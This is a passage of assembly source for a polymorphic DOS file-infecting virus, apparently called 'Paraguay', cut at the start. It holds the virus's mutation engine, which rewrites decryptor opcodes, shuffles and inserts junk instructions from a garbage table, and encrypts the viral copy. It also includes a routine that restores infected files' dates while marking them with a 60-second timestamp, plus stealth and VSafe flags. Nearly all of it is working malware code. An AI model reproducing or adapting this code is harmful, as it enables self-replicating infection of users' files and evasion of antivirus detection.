bx,offset Paso4 ; LEA BX,[BP+XX] mov [bx],09e8dh mov bx,offset Paso5 mov [bx],0c381h ; ADD BX,XX mov bx,offset Paso6 mov [bx],0b953h ; PUSH BX / MOV CX mov bx,offset Paso9 mov [bx],03781h ; XOR WORD PTR [BX] mov bx,offset Paso10 mov [bx],04343h ; INC BX / INC BX jmp AlBuffer Cambia3:mov bx,offset Paso4 ; LEA DI,[BP+XX] mov [bx],0be8dh mov bx,offset Paso5 mov [bx],0c781h ; ADD DI,XX mov bx,offset Paso6 mov [bx],0b957h ; PUSH DI / MOV CX mov bx,offset Paso9 mov [bx],03581h ; XOR WORD PTR [DI] mov bx,offset Paso10 mov [bx],04747h ; INC DI / INC DI AlBuffer: mov cx,200d ; Change opcode order in the table call MuTabla ; named MontonDeBasura sub dx,dx mov bx,offset Ensuciar ; Add random garbage to the decryptor Basureo:xor cx,cx mov cx,[bx] inc bx inc bx push bx push dx mov bx,[bx] call Ygramul pop dx pop bx inc bx inc bx inc dx cmp dx,13 jb Basureo mov cx,(Largor/2) ; Copy virus to heap xor si,si mov di,offset CopiaVir rep movsw mov cx,Cripted ; Encrypt it mov si,(offset CopiaVir+Saltarlos) mov di,si ; To use the decryptor with any mov bx,di ; of the index registers call Desencriptor ; chosen. ret Ensuciar: ; Locations of the decryptor in dw 09,offset Paraguay ; which we'll insert garbage from dw 04,offset Junk02 ; MontonDeBasura dw 02,offset Junk03 dw 06,offset Junk04 dw 03,offset Junk05 dw 05,offset Junk06 dw 02,offset Junk07 dw 04,offset Junk08 dw 03,offset Junk09 dw 07,offset Junk10 dw 02,offset Junk11 dw 04,offset Junk12 dw 08,offset Junk13 ;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ;! PongoFecha: Restore victims date, and time with secs=60 ! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ PongoFecha: mov ax,5701h ; Set db 0b9h ; mov cx,time Time dw 0 ; Last modified time and cl,11100000b ; Set as infected or cl,00011110b ; 30*2=60! db 0bah ; mov dx,date Date dw 0 ; Last modified date pushf ; Call handler directly call dword ptr cs:[Real21h] ret ; And return ;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ;! Sub-Rutine used for pointer moves up to the end ! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ AlFinal:mov ax,04202h ; To the end xor cx,cx cwd ; XOR DX,DX int 21h ret Segmentos: ; DS:=CS & ES:=CS push cs push cs pop ds pop es ret ;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ;! MUTABLA: Exchange the trash opcodes position ! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ MuTabla:xor ax,ax in al,40h ; Random number from port 40h test al,1 ; Is it even? jz YaEsPar inc al ; If not, make it even YaEsPar:mov si,offset MontonDeBasura ; The table add si,ax ; Get a 2 byte-instruction mov dx,[si] ; into DX xor ax,ax in al,40h ; Another random number test al,1 ; If not even, make it even jz Alli inc al Alli: mov di,offset MontonDeBasura ; Garbage 2-byte table add di,ax ; Get the instruction mov bx,[di] ; into bx mov [si],bx ; Exchange its positions mov [di],dx loop MuTabla ; CX times ret ;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ;! YGRAMUL: Chose random junk-instructions and put them into memory ! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ Ygramul:xor di,di ; Garbage intruder Otro: xor ax,ax ; Ygramul, the mutant in Endless Story in al,40h ; Random number test al,1 ; Is it even? jz Aqui inc al ; Nope, add one Aqui: mov si,offset MontonDeBasura add si,ax ; Get the instruction mov ax,si mov dx,[si] mov [bx],dx ; Write it in its position inc bx ; add bx,2 (index) inc bx inc di ; Update the counter cmp di,cx ; Enough? jne Otro ret ;\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ;! Mont¢nDeBasura: The garbage instruction which variate the decryptor ! ;/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/ MontonDeBasura: ; garbage heap ; Instrucci¢n Opcode ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Ä Ä Ä Ä Ä Ä db 087h,0c0h ; xchg ax,ax xchg bx,bx ; 87 DB xchg cx,cx ; 87 C9 xchg dx,dx ; 87 D2 xchg si,si ; 87 F6 xchg di,di ; 87 FF xchg bp,bp ; 87 ED xchg al,al ; 86 C0 xchg bl,bl ; 86 DB xchg cl,cl ; 86 C9 xchg dl,dl ; 86 D2 xchg ah,ah ; 86 E4 xchg bh,bh ; 86 FF xchg ch,ch ; 86 ED xchg dh,dh ; 86 F6 cld ; FB int 03h ; CC nop ; 90 nop ; 90 pushf ; 9C popf ; 9D push es ; 06 pop es ; 07 inc ax ; 40 dec ax ; 48 inc bx ; 43 dec bx ; 4B inc cx ; 41 dec cx ; 49 inc dx ; 42 dec dx ; 4A std ; FD cld ; FC stc ; F9 clc ; F8 jmp short $+2 ; EB 00 jc $+2 ; 72 00 jnc $+2 ; 73 00 jz $+2 ; 74 00 jnz $+2 ; 75 00 jpo $+2 ; 7B 00 jpe $+2 ; 7A 00 jno $+2 ; 71 00 jg $+2 ; 7F 00 js $+2 ; 78 00 or ax,ax ; 0B C0 or bx,bx ; 0B DB or cx,cx ; 0B C9 or dx,dx ; 0B D2 or si,si ; 09 F6 or di,di ; 09 FF or bp,bp ; 09 ED or ah,ah ; 08 E4 or al,al ; 08 C0 or bh,bh ; 08 FF or bl,bl ; 08 DB or ch,ch ; 08 ED or cl,cl ; 08 C9 or dh,dh ; 08 F6 or dl,dl ; 08 D2 and ax,ax ; 23 C0 and bx,bx ; 23 DB and cx,cx ; 23 C9 and dx,dx ; 23 D2 and si,si ; 21 F6 and di,di ; 21 FF and bp,bp ; 21 ED and ah,ah ; 20 E4 and al,al ; 20 C0 and bh,bh ; 20 FF and bl,bl ; 20 DB and ch,ch ; 20 ED and cl,cl ; 20 C9 and dh,dh ; 20 F6 and dl,dl ; 20 D2 mov ax,ax ; 89 C0 mov bx,bx ; 89 DB mov cx,cx ; 89 C9 mov dx,dx ; 89 D2 mov si,si ; 89 F6 mov di,di ; 89 FF mov bp,bp ; 89 ED mov sp,sp ; 89 E4 mov ah,ah ; 88 E4 mov al,al ; 88 C0 mov bh,bh ; 88 FF mov bl,bl ; 88 DB mov ch,ch ; 88 ED mov cl,cl ; 88 C9 mov dh,dh ; 88 F6 mov dl,dl ; 88 D2 cmp ax,ax ; 3B C0 cmp ax,bx ; 3B C3 cmp ax,cx ; 3B C1 cmp ax,dx ; 3B C2 cmp ax,si ; 3B C6 cmp ax,di ; 3B C7 cmp ax,bp ; 3B C5 cmp bx,ax ; 3B D8 cmp bx,bx ; 3B DB cmp bx,cx ; 3B D9 cmp bx,dx ; 3B DA cmp bx,si ; 3B DE cmp bx,di ; 3B DF cmp bx,bp ; 3B DD cmp cx,ax ; 3B C8 cmp cx,bx ; 3B CB cmp cx,cx ; 3B C9 cmp cx,dx ; 3B CA cmp cx,si ; 3B CE cmp cx,di ; 3B CF cmp cx,bp ; 3B CD cmp dx,ax ; 3B D0 cmp dx,bx ; 3B D3 cmp dx,cx ; 3B D1 cmp dx,dx ; 3B D2 cmp dx,si ; 3B D6 cmp dx,di ; 3B D7 cmp dx,bp ; 3B D5 cmp si,ax ; 3B F0 cmp si,bx ; 3B F3 cmp si,cx ; 3B F1 cmp si,dx ; 3B F2 cmp si,si ; 3B F6 cmp si,di ; 3B F7 cmp si,bp ; 3B F5 cmp di,ax ; 3B F8 cmp di,bx ; 3B FB cmp di,cx ; 3B F9 cmp di,dx ; 3B FA cmp di,si ; 3B FE cmp di,di ; 3B FF cmp di,bp ; 3B FD cmp bp,ax ; 3B E8 cmp bp,bx ; 3B EB cmp bp,cx ; 3B E9 cmp bp,dx ; 3B EA cmp bp,si ; 3B EE cmp bp,di ; 3B EF cmp bp,bp ; 3B ED Omega: ; End of virus on the file HeavyMetal dw 0 ; Heavy Metal even in RAM ;) Vsuck db 0 ; Vsafe's flags HacerStealth db 1 ; Flag to make or not the stealth Handle dw 0 ; File's key Atributos db 0 ; File's attribs Vieja24h dd 0 ; 24h's old handler CopiaVir db Largor dup('P') ; Here will go the encrypted virus Cabecera db 45d dup(0) ; We will read the file here FakeHoste: mov ax,4c00h ; Turn back to DOS int 21h End Paraguay ; A virus never is finished, just ; abandonated. Now is my time ;)